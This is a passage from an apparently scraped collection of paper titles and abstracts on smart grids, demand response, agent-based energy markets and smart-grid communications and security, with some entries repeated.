participants in the smart girds. Our theoretical analysis proves that the algorithm converges even if there is some random noise induced in the process of our distributed Lagrange-Newton based solution. The simulation also shows that the result is close to that of centralized solution. --- paper_title: The Smart Grid – A saucerful of secrets? paper_content: To many, a lot of secrets are at the bottom of the often-cited catchphrase "Smart Grid". This article gives an overview of the options that information and communication technology (ICT) offers for the restructuring and modernisation of the German power system, in particular with a view towards its development into a Smart Grid and thus tries to reveal these secrets. After a short outline on the development of ICT in terms of technology types and their availability, the further analysis highlights upcoming challenges in all parts of the power value chain and possible solutions for these challenges through the intensified usage of ICT applications. They are examined with regard to their effectiveness and efficiency in the fields of generation, transmission, distribution and supply. Finally, potential obstacles that may defer the introduction of ICT into the power system are shown. The analysis suggests that if certain hurdles are taken, the huge potential of ICT can create additional value in various fields of the whole power value chain. This ranges from increased energy efficiency and the more sophisticated integration of decentralised (renewable) energy plants to a higher security of supply and more efficient organisation of market processes. The results are true for the German power market but can in many areas also be transferred to other industrialised nations with liberalised power markets. --- paper_title: Integrated Voltage, Var Control and demand response in distribution systems paper_content: This paper addresses the requirements for utilizing Voltage and Var Control for demand response, in an operating environment which includes Smart-Grid, Distribution Management Systems, Advanced Metering Infrastructure, Demand Response, and Distributed Energy Resources. --- paper_title: Optimal pricing of default customers in electrical distribution systems: Effect behavior performance of demand response models paper_content: The response of a non-linear mathematical model is analyzed for the calculation of the optimal prices for electricity assuming default customers under different scenarios and using five different mathematical functions for the consumer response: linear, hyperbolic, potential, logarithmic and exponential. The mathematical functions are defined to simulate the hourly changes in the consumer response according to the load level, the price of electricity, and also depending on the elasticity at every hour. The behavior of the optimization model is evaluated separately under two different objective functions: the profit of the electric utility and the social welfare. The optimal prices as well as the served load are calculated for two different operation schemes: in an hourly basis and also assuming a single constant price for the 24 h of the day. Results obtained by the optimization model are presented and compared for the five different consumer load functions. --- paper_title: Demand side management program evaluation based on industrial and commercial field data paper_content: Demand Response is increasingly viewed as an important tool for use by the electric utility industry in meeting the growing demand for electricity. There are two basic categories of demand response options: time varying retail tariffs and incentive Demand Response Programs. Electricity Saudi Company (ESC) is applying the time varying retail tariffs program, which is not suitable according to the studied load curves captured from the industrial and commercial sectors. Different statistical studies on daily load curves for consumers connected to 22kV lines are classified. The load curve criteria used for classification is based on peak ratio and night ratio. The data considered here is a set of 120 annual load curves corresponding to the electric power consumption (the western area in the King Saudi Arabia (KSA)) of many clients in winter and some months in the summer (peak period). The study is based on real data from several Saudi customer sectors in many geographical areas with larger commercial and industrial customers. The study proved that the suitable Demand Response for the ESC is the incentive program. --- paper_title: Demand Response Architecture: Integration into the Distribution Management System paper_content: Demand Response (DR) refers to actions taken by the utility to respond to a shortage of supply for a short duration of time in the future. DR is one of the enablers of the Smart Grid paradigm as it promotes interaction and responsiveness of the customers and changes the grid from a vertically integrated structure to one that is affected by the behavior of the demand side. In Principle, it is possible to perform DR at the substation level for the customers connected to the feeders downstream or at the demand response service provider (aggregator) for the customers under its territory. This would allow for an area based solution driven mostly by the financial aspects as well as terms and conditions of the mutual agreements between the individual customers and the utility. However, as the penetration of DR increases, incorporating the network model into the DR analysis algorithm becomes necessary. This ensures the proper performance of the DR process and achieves peripheral objectives in addition to achieving the target demand reduction. The added value to the DR algorithm by incorporating the model of the distribution network can only be realized if the engine is developed as an integrated function of the Distribution Management System (DMS) at the network control center level. This paper focuses on the demand response architecture implemented at the DMS level and discusses some practical considerations associated with this approach --- paper_title: Residential Demand Response model and impact on voltage profile and losses of an electric distribution network paper_content: This paper develops a model for Demand Response (DR) by utilizing consumer behavior modeling considering different scenarios and levels of consumer rationality. Consumer behavior modeling has been done by developing extensive demand-price elasticity matrices for different types of consumers. These price elasticity matrices (PEMs) are utilized to calculate the level of Demand Response for a given consumer considering a day-ahead real time pricing scenario. DR models are applied to the IEEE 8500-node test feeder which is a real world large radial distribution network. A comprehensive analysis has been performed on the effects of demand reduction and redistribution on system voltages and losses. Results show that considerable DR can boost in system voltage due for further demand curtailment through demand side management techniques like Volt/Var Control (VVC). --- paper_title: Predictive power dispatch through negotiated locational pricing paper_content: A predictive mechanism is proposed in order to reduce price volatility linked to large fluctuations from demand and renewable energy generation in competitive electricity markets. The market participants are modelled as price-elastic units, price-inelastic units, and storage operators. The distributed control algorithm determines prices over a time horizon through a negotiation procedure in order to maximize social welfare while satisfying network constraints. A simple flow allocation method is used to assign responsibility for constraint violations on the network to individual units and a control rule is then used to adjust nodal prices accordingly. Such a framework is appropriate for the inclusion of aggregated household appliances or other ‘virtual’ market participants realized through smart grid infrastructure. Results are examined in detail for a 4-bus network and then success is demonstrated for a densely-populated 39-bus network. Formal convergence requirements are given under a restricted subset of the demonstrated conditions. The scheme is shown to allow storage to reduce price volatility in the presence of fluctuating demand. --- paper_title: Real-time multi-agent support for decentralized management of electric power paper_content: Establishing clean or renewable energy sources involves the problem of adequate management for the networked power sources, in particular since producers are at the same time also consumers, and vice versa. We describe the first phases of the joint R&D project DEZENT between the School of Computer Science and the College of Electrical Engineering at the University of Dortmund, devoted to decentralized and adaptive electric power management through a distributed real-time multi-agent architecture. Unpredictable consumer requests or producer problems, under distributed control or local autonomy will be the major novelty. We present a distributed real-time negotiation algorithm involving agents on different levels of negotiation, on behalf of producers and consumers of electric energy. Despite the lack of global overview we are able to prove that in our model no coalition of malicious users could take advantage of extreme situations like arising from an abundance as much as from any (artificial) shortage of electric power that are typical problems in "free" or deregulated markets. Our multi-agent system exhibits a very high robustness against power failures compared to centrally controlled architectures. In extensive experiments we demonstrate how, in realistic settings of the German power system structure, the novel algorithms can cope with unforeseen needs and production specifics in a very flexible and adaptive way, taking care of most of the potentially hard deadlines already on the local group level (corresponding to a small subdivision). We further demonstrate that under our decentralized approach customers pay less than under any conventional (global) management policy or structure. --- paper_title: Demand Response and Distribution Grid Operations: Opportunities and Challenges paper_content: Demand response (DR) is becoming an integral part of power system and market operations. Smart grid technologies will further increase the use of DR in everyday operations. Once the volume of the DR reaches a certain threshold, the effect of the DR events on the distribution and transmission system operations will be hard to ignore. This paper proposes changing the business process of DR scheduling and implementation by integrating DR with distribution grid topology. Study cases using OATI webDistribute show the potential DR effect on distribution grid operations and the distribution grid changing the effectiveness of the DR. These examples illustrate the need of integrating demand response with the distribution grid. --- paper_title: Agent-Based Control Framework for Distributed Energy Resources Microgrids paper_content: Distributed energy resources (DERs) provide many benefits for the electricity users and utilities. However, the electricity distribution system traditionally was not designed to accommodate active power generation and storage at the distribution level. The microgrid provides an effective approach to integrating many small-scale distributed energy resources into the bulk electric grid. This paper presents an agent-based control framework for distributed energy resources microgrids. The features of agent technology are first discussed. An agent-based control framework for DER microgrids is then presented. To demonstrate the effectiveness of the proposed agent-based control framework, simulation studies have been performed on a dc distributed energy system that can be used in a microgrid as a modular power generation unit. Simulation results clearly indicate that the agent-based control framework is effective to coordinate the various distributed energy resources and manage the power and voltage profiles. --- paper_title: PowerMatcher: multiagent control in the electricity infrastructure paper_content: Different driving forces push the electricity production towards decentralization. As a result, the current electricity infrastructure is expected to evolve into a network of networks, in which all system parts communicate with each other and influence each other. Multi-agent systems and electronic markets form an appropriate technology needed for control and coordination tasks in the future electricity network. We present the PowerMatcher, a market-based control concept for supply and demand matching (SDM) in electricity networks. In a presented simulation study is shown that the simultaneousness of electricity production and consumption can be raised substantially using this concept. Further, we present a field test with medium-sized electricity producing and consuming installations controlled via this concept, currently in preparation. --- paper_title: An Agent-based Market Platform for Smart Grids paper_content: The trend towards renewable, decentralized, and highly fluctuating energy suppliers (e.g. photovoltaic, wind power, CHP) introduces a tremendous burden on the stability of future power grids. By adding sophisticated ICT and intelligent devices, various Smart Grid initiatives work on concepts for intelligent power meters, peak load reductions, efficient balancing mechanisms, etc. As in the Smart Grid scenario data is inherently distributed over different, often non-cooperative parties, mechanisms for efficient coordination of the suppliers, consumers and intermediators is required in order to ensure global functioning of the power grid. In this paper, a highly flexible market platform is introduced for coordinating self-interested energy agents representing power suppliers, customers and prosumers. These energy agents implement a generic bidding strategy that can be governed by local policies. These policies declaratively represent user preferences or constraints of the devices controlled by the agent. Efficient coordination between the agents is realized through a market mechanism that incentivizes the agents to reveal their policies truthfully to the market. By knowing the agent's policies, an efficient solution for the overall system can be determined. As proof of concept implementation the market platform D'ACCORD is presented that supports various market structures ranging from a single local energy exchange to a hierarchical energy market structure (e.g. as proposed in [10]). --- paper_title: Dynamic Residential Demand Response and Distributed Generation Management in Smart Microgrid with Hierarchical Agents paper_content: Abstract Smart grid has been a significant development trend of power system. Within smart grid, microgrids share the burden of traditional grids, reduce energy consumption cost and alleviate environment deterioration. This paper proposes a dynamic Demand Response (DR) and Distributed Generation (DG) management approach in the context of smart microgrid for a residential community. With a dynamic update mechanism, the DR operates automatically and allows manual interference. The DG management coordinates with DR and considers stochastic elements, such as stochastic load and wind power, to reduce the energy consumption cost of the community. Simulation and numerical results show the effectiveness of the system on reducing the energy consumption cost while keeping users’ satisfaction at a high level. --- paper_title: Residential Demand Response model and impact on voltage profile and losses of an electric distribution network paper_content: This paper develops a model for Demand Response (DR) by utilizing consumer behavior modeling considering different scenarios and levels of consumer rationality. Consumer behavior modeling has been done by developing extensive demand-price elasticity matrices for different types of consumers. These price elasticity matrices (PEMs) are utilized to calculate the level of Demand Response for a given consumer considering a day-ahead real time pricing scenario. DR models are applied to the IEEE 8500-node test feeder which is a real world large radial distribution network. A comprehensive analysis has been performed on the effects of demand reduction and redistribution on system voltages and losses. Results show that considerable DR can boost in system voltage due for further demand curtailment through demand side management techniques like Volt/Var Control (VVC). --- paper_title: Evaluation and assessment of demand response potential applied to the meat industry paper_content: Demand response has proven to be a useful mechanism that produces important benefits for both the customer and the power system. In the context of an increasingly competitive electricity market, where prices are constantly rising and the presence of renewable energy resources is gaining prominence, this paper analyzes the flexibility potential of customers in the meat industry, based on the management of the most energy consuming process in this type of segment: cooling production and distribution. --- paper_title: Review of the Impact of Vehicle-to-Grid Technologies on Distribution Systems and Utility Interfaces paper_content: Plug-in vehicles can behave either as loads or as a distributed energy and power resource in a concept known as vehicle-to-grid (V2G) connection. This paper reviews the current status and implementation impact of V2G/grid-to-vehicle (G2V) technologies on distributed systems, requirements, benefits, challenges, and strategies for V2G interfaces of both individual vehicles and fleets. The V2G concept can improve the performance of the electricity grid in areas such as efficiency, stability, and reliability. A V2G-capable vehicle offers reactive power support, active power regulation, tracking of variable renewable energy sources, load balancing, and current harmonic filtering. These technologies can enable ancillary services, such as voltage and frequency control and spinning reserve. Costs of V2G include battery degradation, the need for intensive communication between the vehicles and the grid, effects on grid distribution equipment, infrastructure changes, and social, political, cultural, and technical obstacles. Although V2G operation can reduce the lifetime of vehicle batteries, it is projected to become economical for vehicle owners and grid operators. Components and unidirectional/bidirectional power flow technologies of V2G systems, individual and aggregated structures, and charging/recharging frequency and strategies (uncoordinated/coordinated smart) are addressed. Three elements are required for successful V2G operation: power connection to the grid, control and communication between vehicles and the grid operator, and on-board/off-board intelligent metering. Success of the V2G concept depends on standardization of requirements and infrastructure decisions, battery technology, and efficient and smart scheduling of limited fast-charge infrastructure. A charging/discharging infrastructure must be deployed. Economic benefits of V2G technologies depend on vehicle aggregation and charging/recharging frequency and strategies. The benefits will receive increased attention from grid operators and vehicle owners in the future. --- paper_title: Smart grid technologies and applications for the industrial sector paper_content: Abstract Smart grids have become a topic of intensive research, development, and deployment across the world over the last few years. The engagement of consumer sectors—residential, commercial, and industrial—is widely acknowledged as crucial for the projected benefits of smart grids to be realized. Although the industrial sector has traditionally been involved in managing power use with what today would be considered smart grid technologies, these applications have mostly been one-of-a-kind, requiring substantial customization. Our objective in this article is to motivate greater interest in smart grid applications in industry. We provide an overview of smart grids and of electricity use in the industrial sector. Several smart grid technologies are outlined, and automated demand response is discussed in some detail. Case studies from aluminum processing, cement manufacturing, food processing, industrial cooling, and utility plants are reviewed. Future directions in interoperable standards, advances in automated demand response, energy use optimization, and more dynamic markets are discussed. --- paper_title: Autonomous Demand-Side Management Based on Game-Theoretic Energy Consumption Scheduling for the Future Smart Grid paper_content: Most of the existing demand-side management programs focus primarily on the interactions between a utility company and its customers/users. In this paper, we present an autonomous and distributed demand-side energy management system among users that takes advantage of a two-way digital communication infrastructure which is envisioned in the future smart grid. We use game theory and formulate an energy consumption scheduling game, where the players are the users and their strategies are the daily schedules of their household appliances and loads. It is assumed that the utility company can adopt adequate pricing tariffs that differentiate the energy usage in time and level. We show that for a common scenario, with a single utility company serving multiple customers, the global optimal performance in terms of minimizing the energy costs is achieved at the Nash equilibrium of the formulated energy consumption scheduling game. The proposed distributed demand-side energy management strategy requires each user to simply apply its best response strategy to the current total load and tariffs in the power distribution system. The users can maintain privacy and do not need to reveal the details on their energy consumption schedules to other users. We also show that users will have the incentives to participate in the energy consumption scheduling game and subscribing to such services. Simulation results confirm that the proposed approach can reduce the peak-to-average ratio of the total energy demand, the total energy costs, as well as each user's individual daily electricity charges. --- paper_title: Intelligent demand response scheme for energy management of industrial systems paper_content: Electric demand side management (DSM) focuses on changing the electricity consumption patterns of end-use customers through improving energy efficiency and optimizing allocation of power. Demand response (DR) is a DSM solution that targets residential, commercial and industrial customers, and is developed for demand reduction or demand shifting at a specific time for a specific duration. In the absence of on-site generation or possibility of demand shifting, consumption level needs to be lowered. While non-criticality of loads at the residential and commercial levels allows for demand reduction with relative ease, demand reduction of industrial processes requires a more sophisticated solution. Production constraints, inventory constraints, maintenance schedules and crew management are some of the many factors that have to be taken into account before one or more processes can be temporarily shut down. An intelligent system is designed in this paper for implementation of DR at an industrial site. Based on the various operational constraints of the industrial process, it determines the loads that could be potentially curtailed. Fuzzy/expert systems are used to derive a priority factor for different candidate loads. This information can then be used by the plant operator/DR client to make a comply/opt-out decision during a utility-initiated DR event. --- paper_title: Utilizing Automated Demand Response in commercial buildings as non-spinning reserve product for ancillary services markets paper_content: In 2009, a pilot program was conducted to investigate the technical feasibility of bidding non-residential demand response (DR) resources into the California Independent System Operator's (CAISO) day-ahead ancillary services market as non-spinning reserves product. Three facilities, a retail store, a local government office building, and a bakery, were recruited into the pilot program and moved from automated price responsive programs to CAISO's participating load program. For each facility, hourly demand, and load curtailment potential were forecasted two days ahead and submitted to the CAISO the day before the trading day as an available resource. These DR resources were optimized against all other generation resources in the CAISO ancillary services market. Each facility was equipped with four-second real time telemetry equipment to ensure resource accountability and visibility to CAISO operators. When CAISO requests DR resources, OpenADR (Open Automated DR) communications infrastructure was utilized to deliver DR signals to the facilities' energy management and control systems. The pre-programmed DR strategies were triggered without a human in the loop. This paper describes the automated system architecture with detailed description of meter feedback in the DR signaling to maintain demand reduction at the government office building. The results showed that OpenADR infrastructure could be used for some products for the ancillary services market and DR strategies for heating ventilation and air conditioning and lighting provide fast enough response to participate in non-spinning reserve product in the ancillary services market. --- paper_title: Quantifying Changes in Building Electricity Use, With Application to Demand Response paper_content: We present methods for analyzing commercial and industrial facility 15-min-interval electric load data. These methods allow building managers to better understand their facility's electricity consumption over time and to compare it to other buildings, helping them to “ask the right questions” to discover opportunities for demand response, energy efficiency, electricity waste elimination, and peak load management. We primarily focus on demand response. Methods discussed include graphical representations of electric load data, a regression-based electricity load model that uses a time-of-week indicator variable and a piecewise linear and continuous outdoor air temperature dependence and the definition of various parameters that characterize facility electricity loads and demand response behavior. In the future, these methods could be translated into easy-to-use tools for building managers. --- paper_title: Findings from Seven Years of Field Performance Data for Automated Demand Response in Commercial Buildings paper_content: California is a leader in automating demand response (DR) to promote low-cost, consistent, and predictable electric grid management tools. Over 250 commercial and industrial facilities in California participate in fully-automated programs providing over 60 MW of peak DR savings. This paper presents a summary of Open Automated DR (OpenADR) implementation by each of the investor-owned utilities in California. It provides a summary of participation, DR strategies and incentives. Commercial buildings can reduce peak demand from 5 to 15percent with an average of 13percent. Industrial facilities shed much higher loads. For buildings with multi-year savings we evaluate their load variability and shed variability. We provide a summary of control strategies deployed, along with costs to install automation. We report on how the electric DR control strategies perform over many years of events. We benchmark the peak demand of this sample of buildings against their past baselines to understand the differences in building performance over the years. This is done with peak demand intensities and load factors. The paper also describes the importance of these data in helping to understand possible techniques to reach net zero energy using peak day dynamic control capabilities in commercial buildings. We present an example in which the electric load shape changed as a result of a lighting retrofit. --- paper_title: Methodology for validating technical tools to assess customer Demand Response: Application to a commercial customer paper_content: The authors present a methodology, which is demonstrated with some applications to the commercial sector, in order to validate a Demand Response (DR) evaluation method previously developed and applied to a wide range of industrial and commercial segments, whose flexibility was evaluated by modeling. DR is playing a more and more important role in the framework of electricity systems management for the effective integration of other distributed energy resources. Consequently, customers must identify what they are using the energy for in order to use their flexible loads for management purposes. Modeling tools are used to predict the impact of flexibility on the behavior of customers, but this result needs to be validated since both customers and grid operators have to be confident in these flexibility predictions. An easy-to-use two-steps method to achieve this goal is presented in this paper. --- paper_title: Opportunities, Barriers and Actions for Industrial Demand Response in California paper_content: LBNL-XXXXX Opportunities, Barriers and Actions for Industrial Demand Response in California Aimee T. McKane, Mary Ann Piette, David Faulkner, Girish Ghatikar, Anthony Radspieler Jr., Bunmi Adesola, Scott Murtishaw and Sila Kiliccote Lawrence Berkeley National Laboratory 1 Cyclotron Road Berkeley, California 94720 January 2008 The work described in this report was coordinated by the Demand Response Research Center and funded by the California Energy Commission, Public Interest Energy Research Program under Work for Others Contract No. 500-03-026 and by the U.S. Department of Energy under Contract No. DE-AC02- 05CH11231. --- paper_title: Load management for refrigeration systems: Potentials and barriers paper_content: As a strategy to deal with the increasing intermittent input of renewable energy sources in Germany, the adaptation of power consumption is complementary to power-plant regulation, grid expansion and physical energy storage. One demand sector that promises strong returns for load management efforts is cooling and refrigeration. In these processes, thermal inertia provides a temporal buffer for shifting and adjusting the power consumption of cooling systems. We have conducted an empirical investigation to obtain a detailed and time-resolved bottom-up analysis of load management for refrigeration systems in the city of Mannheim, Germany. We have extrapolated our results to general conditions in Germany. Several barriers inhibit the rapid adoption of load management strategies for cooling systems, including informational barriers, strict compliance with legal cooling requirements, liability issues, lack of technical experience, an inadequate rate of return and organizational barriers. Small commercial applications of refrigeration in the food-retailing and cold storage in hotels and restaurants are particularly promising starting points for intelligent load management. When our results are applied to Germany, suitable sectors for load management have theoretical and achievable potential values of 4.2 and 2.8Â GW, respectively, amounting to about 4-6% of the maximum power demand in Germany. --- paper_title: Opportunities for Energy Efficiency and Demand Response in the California Cement Industry paper_content: This study examines the characteristics of cement plants and their ability to shed or shift load to participate in demand response (DR). Relevant factors investigated include the various equipment and processes used to make cement, the operational limitations cement plants are subject to, and the quantities and sources of energy used in the cement-making process. Opportunities for energy efficiency improvements are also reviewed. The results suggest that cement plants are good candidates for DR participation. The cement industry consumes over 400 trillion Btu of energy annually in the United States, and consumes over 150 MW of electricity in California alone. The chemical reactions required to make cement occur only in the cement kiln, and intermediate products are routinely stored between processing stages without negative effects. Cement plants also operate continuously for months at a time between shutdowns, allowing flexibility in operational scheduling. In addition, several examples of cement plants altering their electricity consumption based on utility incentives are discussed. Further study is needed to determine the practical potential for automated demand response (Auto-DR) and to investigate the magnitude and shape of achievable sheds and shifts. --- paper_title: The industry demands better demand response paper_content: The promise and hype surrounding the Smart Grid far exceeds its current capabilities. In no area is this truer than with Demand Response (DR) programs for the commercial building sector, which is responsible for 20 percent of energy demand and emissions in the United States. These concentrated pools of demand are a nightmare for ever-more strained utility grids, especially in major cities. As a result, utilities have created DR programs to provide financial incentives for building owners to reduce energy consumption during peak periods. This paper explores what these programs currently entail and why they are not working. It then presents and discusses an alternative that can break the major barriers to adoption of the Smart Grid - moving from a manual to the Optimized Demand Response system. --- paper_title: Agent-based electricity market simulation with demand response from commercial buildings paper_content: With the development of power system deregulation and smart metering technologies, price-based demand response (DR) becomes an alternative solution to improving power system reliability and efficiency by adjusting the load profile. In this paper, we simulate an electricity market with DR from different types of commercial buildings by using agent-based modeling and simulation (ABMS) techniques. We focus on the consumption behavior of commercial buildings with different levels of DR penetration in different market structures. The results indicate that there is a noticeable impact from commercial buildings with price-responsive demand on the electricity market, and this impact differs with different scales of DR participation under different levels of market competitions. --- paper_title: A System Architecture for Autonomous Demand Side Load Management in Smart Buildings paper_content: This paper presents a system architecture for load management in smart buildings which enables autonomous demand side load management in the smart grid. Being of a layered structure composed of three main modules for admission control, load balancing, and demand response management, this architecture can encapsulate the system functionality, assure the interoperability between various components, allow the integration of different energy sources, and ease maintenance and upgrading. Hence it is capable of handling autonomous energy consumption management for systems with heterogeneous dynamics in multiple time-scales and allows seamless integration of diverse techniques for online operation control, optimal scheduling, and dynamic pricing. The design of a home energy manager based on this architecture is illustrated and the simulation results with Matlab/Simulink confirm the viability and efficiency of the proposed framework. --- paper_title: A Survey on Cyber Security for Smart Grid Communications paper_content: A smart grid is a new form of electricity network with high fidelity power-flow control, self-healing, and energy reliability and energy security using digital communications and control technology. To upgrade an existing power grid into a smart grid, it requires significant dependence on intelligent and secure communication infrastructures. It requires security frameworks for distributed communications, pervasive computing and sensing technologies in smart grid. However, as many of the communication technologies currently recommended to use by a smart grid is vulnerable in cyber security, it could lead to unreliable system operations, causing unnecessary expenditure, even consequential disaster to both utilities and consumers. In this paper, we summarize the cyber security requirements and the possible vulnerabilities in smart grid communications and survey the current solutions on cyber security for smart grid communications. --- paper_title: Cyber Security and Privacy Issues in Smart Grids paper_content: Smart grid is a promising power delivery infrastructure integrated with communication and information technologies. Its bi-directional communication and electricity flow enable both utilities and customers to monitor, predict, and manage energy usage. It also advances energy and environmental sustainability through the integration of vast distributed energy resources. Deploying such a green electric system has enormous and far-reaching economic and social benefits. Nevertheless, increased interconnection and integration also introduce cyber-vulnerabilities into the grid. Failure to address these problems will hinder the modernization of the existing power system. In order to build a reliable smart grid, an overview of relevant cyber security and privacy issues is presented. Based on current literatures, several potential research fields are discussed at the end of this paper. --- paper_title: A Survey on Smart Grid Communication Infrastructures: Motivations, Requirements and Challenges paper_content: A communication infrastructure is an essential part to the success of the emerging smart grid. A scalable and pervasive communication infrastructure is crucial in both construction and operation of a smart grid. In this paper, we present the background and motivation of communication infrastructures in smart grid systems. We also summarize major requirements that smart grid communications must meet. From the experience of several industrial trials on smart grid with communication infrastructures, we expect that the traditional carbon fuel based power plants can cooperate with emerging distributed renewable energy such as wind, solar, etc, to reduce the carbon fuel consumption and consequent green house gas such as carbon dioxide emission. The consumers can minimize their expense on energy by adjusting their intelligent home appliance operations to avoid the peak hours and utilize the renewable energy instead. We further explore the challenges for a communication infrastructure as the part of a complex smart grid system. Since a smart grid system might have over millions of consumers and devices, the demand of its reliability and security is extremely critical. Through a communication infrastructure, a smart grid can improve power reliability and quality to eliminate electricity blackout. Security is a challenging issue since the on-going smart grid systems facing increasing vulnerabilities as more and more automation, remote monitoring/controlling and supervision entities are interconnected. --- paper_title: Scalable and Robust Demand Response With Mixed-Integer Constraints paper_content: A demand response (DR) problem is considered entailing a set of devices/subscribers, whose operating conditions are modeled using mixed-integer constraints. Device operational periods and power consumption levels are optimized in response to dynamic pricing information to balance user satisfaction and energy cost. Renewable energy resources and energy storage systems are also incorporated. Since DR becomes more effective as the number of participants grows, scalability is ensured through a parallel distributed algorithm, in which a DR coordinator and DR subscribers solve individual subproblems, guided by certain coordination signals. As the problem scales, the recovered solution becomes near-optimal. Robustness to random variations in electricity price and renewable generation is effected through robust optimization techniques. Real-time extension is also discussed. Numerical tests validate the proposed approach. --- paper_title: Smart Grid — The New and Improved Power Grid: A Survey paper_content: The Smart Grid, regarded as the next generation power grid, uses two-way flows of electricity and information to create a widely distributed automated energy delivery network. In this article, we survey the literature till 2011 on the enabling technologies for the Smart Grid. We explore three major systems, namely the smart infrastructure system, the smart management system, and the smart protection system. We also propose possible future directions in each system. colorred{Specifically, for the smart infrastructure system, we explore the smart energy subsystem, the smart information subsystem, and the smart communication subsystem.} For the smart management system, we explore various management objectives, such as improving energy efficiency, profiling demand, maximizing utility, reducing cost, and controlling emission. We also explore various management methods to achieve these objectives. For the smart protection system, we explore various failure protection mechanisms which improve the reliability of the Smart Grid, and explore the security and privacy issues in the Smart Grid. --- paper_title: A Reliability Perspective of the Smart Grid paper_content: Increasing complexity of power grids, growing demand, and requirement for greater reliability, security and efficiency as well as environmental and energy sustainability concerns continue to highlight the need for a quantum leap in harnessing communication and information technologies. This leap toward a ?smarter? grid is widely referred to as ?smart grid.? A framework for cohesive integration of these technologies facilitates convergence of acutely needed standards, and implementation of necessary analytical capabilities. This paper critically reviews the reliability impacts of major smart grid resources such as renewables, demand response, and storage. We observe that an ideal mix of these resources leads to a flatter net demand that eventually accentuates reliability challenges further. A gridwide IT architectural framework is presented to meet these challenges while facilitating modern cybersecurity measures. This architecture supports a multitude of geographically and temporally coordinated hierarchical monitoring and control actions over time scales from milliseconds and up. --- paper_title: The Progressive Smart Grid System from Both Power and Communications Aspects paper_content: The present electric power system structure has lasted for decades; it is still partially proprietary, energy-inefficient, physically and virtually (or cyber) insecure, as well as prone to power transmission congestion and consequent failures. Recent efforts in building a smart grid system have focused on addressing the problems of global warming effects, rising energy-hungry demands, and risks of peak loads. One of the major goals of the new system is to effectively regulate energy usage by utilizing the backbone of the prospectively deployed Automatic Meter Reading (AMR), Advanced Meter Infrastructure (AMI), and Demand Response (DR) programs via the advanced distribution automation and dynamic pricing models. The function of the power grid is no longer a system that only supplies energy to end users, but also allows consumers to contribute their clean energy back to the grid in the future. In the meantime, communications networks in the electric power infrastructure enact critical roles. Intelligent automation proposed in smart grid projects include the Supervisory Control And Data Acquisition/Energy Management Systems (SCADA/EMS) and Phasor Management Units (PMU) in transmission networks, as well as the AMR/AMI associated with field/neighborhood area networks (FAN/NAN) and home area networks (HAN) at the distribution and end-use levels. This article provides an overview of the essentials of the progressive smart grid paradigm and integration of different communications technologies for the legacy power system. Additionally, foreseeable issues and challenges in designing communications networks for the smart grid system are also rigorously deliberated in this paper. --- paper_title: Managing smart grid information in the cloud: opportunities, model, and applications paper_content: Smart grid (SG), regarded as the next-generation electric grid, will use advanced power, communication, and information technologies to create an automated, intelligent, and widely distributed energy delivery network. In this article, we explore how cloud computing (CC), a next-generation computing paradigm, can be used for information management of the SG and present a novel SG information management paradigm, called Cloud Service-Based SG Information Management (CSSGIM). We analyze the benefits and opportunities from the perspectives of both the SG and CC domains. We further propose a model for CSSGIM and present four motivating applications. --- paper_title: A Survey of Communication Protocols for Automatic Meter Reading Applications paper_content: Utility companies (electricity, gas, and water suppliers), governments, and researchers have been urging to deploy communication-based systems to read meters, known as automatic meter reading (AMR). An AMR system is envisaged to bring on benefits to customers, utilities, and governments. The advantages include reducing peak demand for energy, supporting the time-of-use concept for billing, enabling customers to make informed decisions, and reducing the cost of meter reading, to name a few. A key element in an AMR system is communications between meters and utility servers. Though several communication technologies have been proposed and implemented at a small scale, with the wide proliferation of wireless communication, it is the right time to critique the old proposals and explore new possibilities for the next generation AMR. We provide a comprehensive review of the AMR technologies proposed so far. Next, we present how future AMRs will benefit from third generation (3G) communication systems, the DLMS/COSEM (Data Language Messaging Specification/Companion Specification for Energy Metering) standard and Internet Protocol-based SIP (Session Initiation Protocol) signaling at the application level. The DLMS/COSEM standard provides a framework for meters to report application data (i.e. meter readings) to a utility server in a reliable manner. The SIP protocol is envisaged to be used as the signaling protocol between application entities running on meters and servers. The DLMS/COSEM standard and the SIP protocol are expected to provide an application level communication abstraction to achieve reliability and scalability. Finally, we identify the challenges at the application level that need to be tackled. The challenges include handling failure, gathering meter data under different time constraints (ranging from real-time to delay-tolerance), disseminating (i.e., unicasting, multicasting, broadcasting, and geocasting) control data to the meters, and achieving secure communication. --- paper_title: Communication services and data model for demand response paper_content: Demand response (DR) is becoming an integral part of the modern power distribution systems. By partially reducing the consumption level or shifting it from peak hours to off-peak hours, DR can function as a tool for the utility to respond to shortage of supply for a short duration of time. It helps stabilize the electricity market, postpone capacity expansion projects for building new power generation units, and can potentially lead to mutual financial benefits for the utility as well as the customers. DR is one of the enablers of the Smart Grid paradigm as it promotes the interaction and responsiveness of the customers and changes the grid from a vertically integrated structure to one that is also affected by the behavior of the demand side. Essential to successful implementation of demand response is an efficient communication infrastructure capable of providing a secure two-way data exchange means between the utility and the customers. The focus of this paper is on the communication services and data models that are needed for realization of DR at the residential and commercial levels. The proposed model is platform independent, promoting interoperability as one of the key operational requirements of demand response implementation. --- paper_title: Smart Grid Communications: Overview of Research Challenges, Solutions, and Standardization Activities paper_content: Optimization of energy consumption in future intelligent energy networks (or Smart Grids) will be based on grid-integrated near-real-time communications between various grid elements in generation, transmission, distribution and loads. This paper discusses some of the challenges and opportunities of communications research in the areas of smart grid and smart metering. In particular, we focus on some of the key communications challenges for realizing interoperable and future-proof smart grid/metering networks, smart grid security and privacy, and how some of the existing networking technologies can be applied to energy management. Finally, we also discuss the coordinated standardization efforts in Europe to harmonize communications standards and protocols. --- paper_title: Integrated Voltage, Var Control and demand response in distribution systems paper_content: This paper addresses the requirements for utilizing Voltage and Var Control for demand response, in an operating environment which includes Smart-Grid, Distribution Management Systems, Advanced Metering Infrastructure, Demand Response, and Distributed Energy Resources. --- paper_title: Dynamic Pricing? Not So Fast! A Residential Consumer Perspective paper_content: With the installation of smart metering, will residential customers be moved to "dynamic" pricing? Some supporters of changing residential rate design from a fixed and stable rate structure believe customers should be required to take electric service with time-variant price signals. Not so fast, though! There are real implications associated with this strategy. --- paper_title: Demand Response and Distribution Grid Operations: Opportunities and Challenges paper_content: Demand response (DR) is becoming an integral part of power system and market operations. Smart grid technologies will further increase the use of DR in everyday operations. Once the volume of the DR reaches a certain threshold, the effect of the DR events on the distribution and transmission system operations will be hard to ignore. This paper proposes changing the business process of DR scheduling and implementation by integrating DR with distribution grid topology. Study cases using OATI webDistribute show the potential DR effect on distribution grid operations and the distribution grid changing the effectiveness of the DR. These examples illustrate the need of integrating demand response with the distribution grid. --- paper_title: A Framework for Evaluation 